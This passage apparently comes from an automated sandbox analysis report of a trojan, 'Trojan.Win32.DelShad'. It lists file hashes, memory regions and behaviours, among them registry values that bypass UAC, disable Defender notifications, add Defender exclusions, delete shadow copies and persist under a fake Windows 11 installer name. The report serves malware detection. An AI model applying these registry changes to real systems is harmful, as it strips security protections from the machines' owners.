| SHA512 | e0fdfcdc72bb0b4194d4e994e04b528e67ab5b95a9d346da74a0f0e1d0aefa79d2a547892eacd29d5c9fbc4c8ffced4bd9dccdee8bee02c9d8e5ad5c6710e7a8 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 60c4a7e2cf4efaaa5dd1faf837dcbe8d |
| SHA1 | 1c21c8a9f1834affe9017e1843fa4bf8f8011624 |
| SHA256 | 1152acdf6b94a5d48d56b5cb78199be434106a5d223bbdce65c6a3d681296ff1 |
| SHA512 | 30043e461f3e1f9a19d24dc582d171a7b50cb9c60fbe03ece12eedbed3d41b745714327706c3e93265aab98f206fc144a7e03904465fcb19d9a681b8639a1e09 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | bb20ef9c5e8647b19e7af26229108c99 |
| SHA1 | ff642a69365bdf05364872d951ff5bf9c403a804 |
| SHA256 | ef63978031b34cdc4613db378395ce28f3cc7d35f318ac62f730f90edf181f44 |
| SHA512 | 914ace2948982c607c61293d79bef662446b5227eac258abfdf601ef8eb968680ba5ceca1319d0c32064c21ded5812c0b3319642749083d52ea8905da82bc22f |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 24ec3a554f64015482f0960b410d8bd0 |
| SHA1 | 475ff8b22800c59a3f7446e693eac5292532f39e |
| SHA256 | 1692df1cc5b0f58b7df9ab78821a06196b0466683983c8949cf6b01ef12b0df2 |
| SHA512 | 977a9a1984c06800487eef736a1a9061acb6f62c6aa66dba919339007aa973bbf9a10e51482bdb59e14ff646b2c85c6198e59211d116b148fb7ca1d53415f3e4 |
C:\Windows\system32\drivers\etc\hosts
| MD5 | 710e85ee4c7bf73f9c8e8b0e0224af55 |
| SHA1 | 61f0aae0865344c6f799cf489c02ec64cc50bdd3 |
| SHA256 | e5c6683bb998f821dc813fe05eed0e90a73dcc64589238370871ec2cf1e12246 |
| SHA512 | 5221fd39ceae5a40393884d03122e3023e8b8b46808ce47ced7e6bc416838e539109bed81c3f3bf1cbe9034a86cef08c3f3f791a04b5dc7762af0e5a9726fc27 |
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd
| MD5 | 22a845995279c76177c613100a58d134 |
| SHA1 | 5cc94610bcdba7b0d514b711852a6cdb56db3ae1 |
| SHA256 | ca30adad79ccd83b3dc79f26a58c1552559176f8a271237c6d4d7ccf307920c0 |
| SHA512 | 0a4a3eb765847ab66e847bb83202ee8ad5d8591659a8be9e3ed4b6863f3aac28f9d4f6e2d4ca5c5efe800cfe30d471122b2f96807c2735dde5c6ade16c064cad |
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\rp.exe
| MD5 | 408dd6ade80f2ebbc2e5470a1fb506f1 |
| SHA1 | e00293ce0eb534874efd615ae590cf6aa3858ba4 |
| SHA256 | 4c82fbafef9bab484a2fbe23e4ec8aac06e8e296d6c9e496f4a589f97fd4ab71 |
| SHA512 | 4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0 |
C:\Users\Admin\AppData\Local\Temp\5w0e2v0n.tmp
| MD5 | 31c5a8d7f0d900bfff09d437a7457478 |
| SHA1 | c32f7abbc47949c340a2136bb8cc4787f05b1eff |
| SHA256 | 89da44ebaa36a31740f9dbc585cefc3f55cf725f7d8d745b44ba259f0a1d8455 |
| SHA512 | 0089a7e5e0c3d7b8a226775f30983e901b323846d5263366672390ebbbd9212bd72bdb87c7baeeb09c6438317a66f5ccfc20cd898579190e6bb7579dd1cd158a |
C:\Users\Admin\AppData\Local\Temp\autDD13.tmp
| MD5 | bdb4dcbcec51d9ee1afee83221921fee |
| SHA1 | 21d56a9334238297d1a09aba46043cc36c9e2d3c |
| SHA256 | 9e5d8505b986e40cce00707180334fead34c0c3b590c458305de89e4bbc85f75 |
| SHA512 | cad20e6355cfe1e42a4ee7f5350a033ec79b8ed2689d8c6fa11bb1c3ae2a99425f03d95312ed9daf5c2543fc7ce38239fca41700cbecbc02a007a669ffd81fa5 |
C:\Users\Admin\AppData\Local\Temp\autDD02.tmp
| MD5 | c87a407a6decc862e3132efc8ab504c9 |
| SHA1 | 20cd713fa491119aabfd25a7cce7a8209098f903 |
| SHA256 | 439de9f662754bbcfc211658ce3f1c1730e85df199ed1e067940e28831d2c758 |
| SHA512 | 8bed0ca582ca5b46f0c6922995343388df0d84d063512308d3f58c31da1811cb2c47b87be0ce5de4a1fb8ce14f89f8f3197f31bb0ca989fa159514f6751e1832 |
C:\Users\Admin\AppData\Local\Temp\autDD14.tmp
| MD5 | 3886aae8ae30f288363ce4d2ac4f81c2 |
| SHA1 | 19441c886b57ed9f4650f614f0d93501d0a33e40 |
| SHA256 | 37f10f3d46a2886cac6169a398e91dd8cd0cfd06a7b6812e1afb68c4c031b9fd |
| SHA512 | b37aa26a5324723d9b8a7b919c3727565a1e1974ba1316093b59dbe4a75f5e0773288894d7abb403d65688e0e3f29ef4b48af7a8048e64fe36199bf8d371fb31 |
C:\Windows\Temp\4f6v2e8z.tmp
| MD5 | a69e54b63a067cefab41736717e9348b |
| SHA1 | 96e00b5f3170d19d173e62b97c1691fac8edfb98 |
| SHA256 | c72184932dd0541095be4827e5f86b3db735cfc651f04b50a1cc783d9037d75d |
| SHA512 | 13385b98377cb664907a5189cbf63f575c86b5b705df2a458ae21c6fd63f6cbf77451e8f17b22af8921a3342f31445278cb8450e1cc58fe33eecffe81e56cdda |
C:\Users\Admin\AppData\Local\Temp\is-GAULI.tmp\tmp\.cmd
| MD5 | 6f0d036f6681bac6fd742591ddc62808 |
| SHA1 | 2e518c19ec29b7a3a69cd9d4c120d3b88d71102b |
| SHA256 | ce8f0822d428e39157fc6ed433b8da7fa7ce62ece2c73bed9930d50f7cb41f24 |
| SHA512 | 8aeb47d8a15ab62a1a6e23f93a916f361703d2ac64a302d2364d40de016dc2167d653ca905197d81e4c578fdbb81eb88a22c7cd81abe08756ec86dda6a44aaf6 |
C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr
| MD5 | e9f5799bcca4695afee82c0781242577 |
| SHA1 | 240bf1ae93f432aef2a05daeed3299d12bd7e6f8 |
| SHA256 | dc24023611f63b84f4fddc095a1417518ae1972743dbbff014d31218770e48d6 |
| SHA512 | b1551197efd2209b633ed0ca581332a1871416a541a64ef99dffd75c7a082b65c4fa3abdc15b84ff92cdac224c6616a40c17b33c268df3f6244f0b2c920b143c |
memory/2388-489-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/2516-491-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/2516-492-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/4104-497-0x0000000000400000-0x000000000071D000-memory.dmp
memory/4104-501-0x0000000000400000-0x000000000071D000-memory.dmp
memory/2388-504-0x0000000000400000-0x00000000004E3000-memory.dmp
memory/2516-505-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1500-510-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-511-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-509-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-508-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/2516-513-0x0000000000400000-0x00000000006A8000-memory.dmp
memory/1500-506-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-512-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-517-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-515-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-514-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-516-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\write.zip
| MD5 | 3e67b93b520e02f8f2e921699058dc67 |
| SHA1 | 46389ff76252d50c084ca75562ca8f1e52a1600b |
| SHA256 | 46a81ce975d504053383859df735eb7e2d07b462f6579e34ff31abe4f387868c |
| SHA512 | 82831ef410c4e5b247365881cc4f9d427e19cde81a98a1ef274df74dbb6457db111d789f80261994b4b4018fd6c8cace87bbc8bb85e0f00ba20e4e713d464f7c |
memory/1500-547-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-548-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-546-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-550-0x0000000011000000-0x0000000011158000-memory.dmp
memory/1500-551-0x0000000003210000-0x00000000032B7000-memory.dmp
memory/3720-561-0x000001D6F7230000-0x000001D6F7252000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4a53wlik.qgp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1500-567-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-568-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 566196008fd3b62fea9bb56193337a45 |
| SHA1 | 7ce0b22d7ef882fd1e75b7ec9aa9f9cf6c37ee0f |
| SHA256 | 935a35d6b093da96fe41078e8c9e94bf3739c0473468381f038abe4897a2d3b3 |
| SHA512 | 91d46b12a52e70070c89e8ff14381e94b08e1c77571e516bacdc19c8cbc657c1e6c018d43361beafb4fc361c660bb1546a0eb6b7e3305a5ee4c6d7e6b85584d4 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | dc3369dfedf8231eb340f9d7777ee067 |
| SHA1 | 44e1401599d4f6bb2936b092a95168611a8e1e53 |
| SHA256 | ab37d732267dbd467901d741cf45422ea39f16a6fb8e95269fe9778a3a6468ef |
| SHA512 | ddc7a9a769cf5293dbaf9961dced1e8f1231a1c9054c0849f44a0257dbdee10562a523632951d122dfe73ef72345978cff59a6bbb8e80a4d6209a5aa477fd5a5 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 6cf293cb4d80be23433eecf74ddb5503 |
| SHA1 | 24fe4752df102c2ef492954d6b046cb5512ad408 |
| SHA256 | b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8 |
| SHA512 | 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 548dd08570d121a65e82abb7171cae1c |
| SHA1 | 1a1b5084b3a78f3acd0d811cc79dbcac121217ab |
| SHA256 | cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc |
| SHA512 | 37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b |
memory/1500-587-0x0000000000400000-0x0000000000AE1000-memory.dmp
memory/1500-588-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | e1c4dd4d5d8d148fbd453dd494f573a9 |
| SHA1 | 15a3c81ae4528cd8ceb9c4ce7ee1fdb354aeeff9 |
| SHA256 | 4aa90af4d0ac7e0ec31026c6c8fa477b950cb3e489887c23743252b1258452ed |
| SHA512 | 3bd5d67b1af2180b2c335f6b0034eea571140437bfa43aa3e4e860b00582d4609e565e1fe8d3f09c752feaea7decbc014203e85930ccb10cdb49ba7d9ddb958b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 128b92209197100ce7aff24e1fcb531e |
| SHA1 | 3333b685091e506aba63a8fa480abcb3e387ca11 |
| SHA256 | 486ea5d4e5a060d5e2b325a29184963117b806eac4c3c8f2054e270977a6a76b |
| SHA512 | 75aa70ee708b793be9a72a11a6e60c356181bbb93d6c2addd627606974048733f760850f4022926fc0f13b8a7dcdd94cd4b4a5374a0e57d236525649fe7a221f |
C:\Users\Admin\AppData\Local\Temp\qtc9j1wbnrqd240699406.tmp
| MD5 | 835216de14bf2793abd0586da1d76ce1 |
| SHA1 | bd87afd6af0104d875ccd1216543efedc79e0348 |
| SHA256 | 27fbf4c0081c9f9116dc8ac834b418d2e5e487a234b311c4d01df520e632ac42 |
| SHA512 | 340834eab831ddf8caa8ea671e852dd02a203730a2dfde79789a843343916e6b5e644556646ae9c3a149220960442669b7e66755819afd8f9825a79032e7623f |
C:\Users\Admin\AppData\Local\Temp\4l3szsqpghx240699406.tmp
| MD5 | c3f87d238aaed9863b6793637d2a2b70 |
| SHA1 | 8125a310c5917614e923f0199c29ba9db940f4e5 |
| SHA256 | 1e09147618a4cb8a9f1934d7aa7e5a1d63e6b59d520f99d2463da9f985862e28 |
| SHA512 | f1ea6ac293be1198fedaa6ab1a797e287d6ec3ad04b4918526a30e1dd53e39f3f7ae859695f5fc263f26433c40e1a295d7bea1ce8d3d15a55adc7c3227533b95 |
C:\Users\Admin\AppData\Local\Temp\s0g722c9e4j4ta1w240699406.tmp
| MD5 | 28bd22d15439cc77c7c0fe7cf08c00be |
| SHA1 | e2ab393f9b56244fe1a6f74a90d44309c3fdd72c |
| SHA256 | 059272d6cd27138a93b2e057fc0be12fcea0103ad13039bdd96d0e5b45979904 |
| SHA512 | f623cb0bef8ef79b59c751d4f86d49625e096dc96b276f830cba9847294006188b933574148305d2e4da9a9b720ee4dbcc0681f040ea844b4e8ae5685a0d9fb8 |
memory/1500-615-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 9a806d8fa80b249b8496970f0e861757 |
| SHA1 | f66d889c631374d20f34f63080e70d0fc1b64c34 |
| SHA256 | 255640b1083a1404de2776d2bfdf7e0f62bb2f3e8768b0123483bb2b138208c7 |
| SHA512 | 8e9662ed95a168263c6da255a12f6be7912c6e0d1483345e8c068633f24a5a59ca9380120561e0d90fc4367a79bf5dfe00b368891581ace1f794be92736f41fc |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 8acf8824ca8a7a5f6006d7027cb222df |
| SHA1 | 3e31fd65c6af8d1478abb028e45a0c6ddb9551d4 |
| SHA256 | e60b40ecf21924803020ea1b8683bd03a447fbcb3b0f03973f55af26d460a0e4 |
| SHA512 | a0011284c3deef2ce1a27f5788579a956892c64c88fe4107b90ce0c6d27b549f4adfcb5d157aa7e03db23b2f40a98b9e11846444a8edbef9f2b6775d300a89e1 |
C:\Users\Admin\AppData\Local\Temp\kbvc7t58g7u3ky240705343.tmp
| MD5 | 40f3eb83cc9d4cdb0ad82bd5ff2fb824 |
| SHA1 | d6582ba879235049134fa9a351ca8f0f785d8835 |
| SHA256 | cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0 |
| SHA512 | cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 561de019b9840a42747a02592313ff87 |
| SHA1 | c719ffcb7f0a14cf423701538ed3260eab73cd0f |
| SHA256 | 8c8f14a0e1291359222b414da52809cfbe2617c1bf8ed74ac659681012d44bd7 |
| SHA512 | 28bb19843da07444da3b2332f6960a63ad01fd7afde7551fc4fe50c9de894cd065629381202ffe7be6671a7ea7a6fc0aadf9a3842d415bf6d6db9e8b4c6002c6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 873ba23f7e507f90cc56b43e045ec280 |
| SHA1 | 90daa1586ebe076fca078be2bcaf7dce463653e3 |
| SHA256 | ae29c38c2dd18cad6a19583cc849e538455fa3f0d87cfdd44894dc78c70c8097 |
| SHA512 | 2c458439159ebc6165b0917310b5ce47eefd1a025cd7f4bac9897d1bb985a72b917978cdfb37fca35d1d18c68d65e5b310ba8619c73a9db353605d5a930cdea5 |
memory/1500-654-0x0000000000400000-0x0000000000AE1000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 3b908c0ed8a6c413ede0a4aeb54f2a40 |
| SHA1 | 69c4a4378372921adf424f4b0c9245d158282413 |
| SHA256 | e9a953d94ac65ce488b80e6e1b06f3ae883db98cc7ed3075725dc89530ef38f3 |
| SHA512 | 3095c2031dec75724ae3e0193176c15aa0fe26e223ac1090d2a12cc29a1385d04a31e9e0e2085aa9c9ce8d85bed7216936e4d687c34f42dd96228ac93f5073bb |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 1c8ed1293d221f14d6142addad60bb7e |
| SHA1 | 6c236459abbd5617fe62f1c1898c5cdc072f0bcb |
| SHA256 | 0992caa251b9bdf1f789dcf487dc29dad58f2376578573c037d106f608743dd5 |
| SHA512 | 3a0716fdbd3a62a065e6f1c5479a495e98bafdd026a3b2c33a0d181ba06069f8f14e910daa69000432da983a0bb87ea4db804562149d58049e393ce0206fe52c |
memory/1500-672-0x0000000000400000-0x0000000000AE1000-memory.dmp
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | ca986d9782f99b6f0282259ce0d15a25 |
| SHA1 | d610fe9bd5f719efa3769208e48947a888593a93 |
| SHA256 | 551551236a850c5a767f4d2aab66d4f4d80b3ca42419cd63b2954966de50ac88 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 23:57
Reported
2024-11-15 00:00
Platform
win10ltsc2021-20241023-en
Max time kernel
150s
Max time network
156s
Command Line
Signatures
Modifies Windows Defender notification settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\sOFTwAre\micrOsOfT\WIndoWs defender sECuritY centEr\notIFICATions | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications\dIsablEEnhAncEdnOtiFiCatiOns = "1" | C:\Windows\system32\reg.exe | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsenTPrompTbEhAvIoradmin = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\COnsEnTPromptbehavIOrUser = "0" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromPTOnsECUredesKtoP = "0" | C:\Windows\system32\reg.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SofTWArE\mIcrosOfT\windOwS dEfENdEr\EXClUSiOnS\ExtEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\EXE = "0" | C:\Windows\system32\rEg.EXE | N/A |
| Key created | \REGISTRY\MACHINE\soFtwarE\mIcroSoFT\WINdows dEfEndEr\ExclUSiOnS\EXTENsiONs | C:\Windows\system32\rEG.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\SCr = "0" | C:\Windows\system32\rEG.EXE | N/A |
| Key created | \REGISTRY\MACHINE\sOFTWArE\mIcrOsofT\WindoWS dEFEndEr\ExClUsions\ExTEnSIOns | C:\Windows\system32\rEg.EXE | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions\Cmd = "0" | C:\Windows\system32\rEg.EXE | N/A |
Deletes shadow copies
Disables use of System Restore points
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Windows\system32\cmd.exe | N/A |
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-870806430-2618236806-3023919190-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows11InstallationAssistant.lnk | C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp | N/A |
Executes dropped EXE
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Reads user/profile data of web browsers
Checks installed software on the system
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipINFO.io | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1276 set thread context of 1652 | N/A | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-U7LE5.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-I11FA.tmp\Trojan.Win32.DelShad.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-9NHVL.tmp\tmp\rp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.scr | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Trojan.Win32.DelShad.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
| N/A | N/A | C:\Windows\system32\find.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | C:\Users\Admin\AppData\Roaming\Windows11InstallationAssistant\Windows11InstaIIation.sCr | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
